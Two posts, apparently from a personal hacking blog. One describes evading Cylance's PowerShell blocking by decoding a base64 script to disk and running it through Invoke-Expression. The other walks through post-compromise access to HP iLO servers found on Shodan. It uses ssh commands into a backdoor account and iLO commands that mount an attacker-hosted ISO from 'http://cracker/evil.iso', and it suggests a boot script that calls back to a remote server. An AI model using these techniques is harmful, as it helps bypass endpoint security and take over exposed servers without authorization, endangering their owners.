Bypass Cylance AV to run PowerShell Scripts.

So I was trying to automate the installation of some software using PowerShell (PS). Naturally I made up a ps script, but when I attempted to run it on machines with Cylance installed it was blocked by Cylance and it complained that it does not like me trying to run PS scripts. 

Challenge accepted! 

My first attempt was to use EncodedCommand, but wasted a bunch of time and gave up, lol. It has to be a, what I would say is a non-standard base64 encoding, to execute. Didn't find that out until I was a few hours in! Trying to find an easy way to ecode never panned out, even the great cyberchef failed me.

So I couldn't run PS scripts out right and didn't have time for EncodedCommand "im sure I was just doing something wong", so I moved on to Invoke-Expression (IE). 

M$ says, "The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. Without Invoke-Expression, a string submitted at the command line is returned (echoed) unchanged." 

So we can use IE to execute any string, First I tried to just put my script in a variable, but PS never liked it. I think the line breaks or some char was messing it up, Then looked at reading a file and putting it into a variable. So I base64 encoded the text from my script and used [Convert]::FromBase64String to decode then wrote it to a file in C:\Users\Public\ because I couldn't be sure what user context it was going to write in so I bet on low privileges.  Then used Get-Content -Raw to pull it into a variable, passed it to IE and Whammy! it worked. The most complicated process I could come up with to bypass Cylance PS script blocking :)

Enjoy the 1's and 0's

IPMI exposure over the internet, IPMIPWN & post compromise activities.

Another stop along memory lane is my favored thing to boast about, IPMIPWN! :P

I thought I would dive back into Shodan and check out the status of the attack surface after all this time. As expected, still stocked with targets! So this time around I wanted to took a look beyond penetration and look at post compromise activity.

Its been a while since I first made IPMIPWN, so a few things have changed. The servers out there are so old that the ciphers used for ssh are no longer supported a modern desktop ssh clients by default, making my first ssh attempt post IPMIPWN hax0rin was much like the below:

ssh backdoor2@target.com

Unable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Google said to added -o KexAlgorithms=diffie-hellman-group14-sha1, Then: 

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 backdoor2@target.com

Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss backdoor2@target.com

Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc backdoor2@target.com

Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1 

And then:

C:\Users\hacker> ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc -m hmac-sha1 backdoor2@target.com

The authenticity of host 'target.com' can't be established.

DSA key fingerprint is SHA256:LkuLO3/0BBf4iCXIeOO/d9kjh987trtA30pZZkS/ruc.

This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added 'target.com' (DSA) to the list of known hosts.

backdoor2@target.com's password:

User:backdoor2 logged-in to ILOBRC444.(target.com)

iLO 3 Standard 1.26 at  Aug 26 2011

Server Name: SER_EPAPAR

Server Power: On

</>hpiLO->

 

Ok, so IPMIPWN got us this far, what next? A few possible attack paths might involve virtual media (VM) functionality. Here is how that might be setup:

First, See what VM is loaded if any

 </>hpiLO-> show map1/oemhp_vm1/cddr1

 Set our own VM

</>hpiLO-> cd map1/oemhp_vm1/cddr1

</map1/oemhp_vm1/cddr1>hpiLO-> set oemhp_image=http://cracker/evil.iso

Enable our "attacker controlled" VM

 </>hpiLO-> set /map1/oemhp_vm1/cddr1 oemhp_boot=connect

Confirm our changes

 </map1/oemhp_vm1/cddr1>hpiLO-> show

I used webhook.site to confirm this attack with great successes, as soon as you set oemhp_boot to connect, you should start seeing connection requests. You could also make your own Kali ISO that has a script to connect to a server somewhere, run on boot or network connection confirmation. More attack paths later >:)

Enjoy the 1's and 0's.. 

Happy New Year!!

 

so imma lilate, sue me :P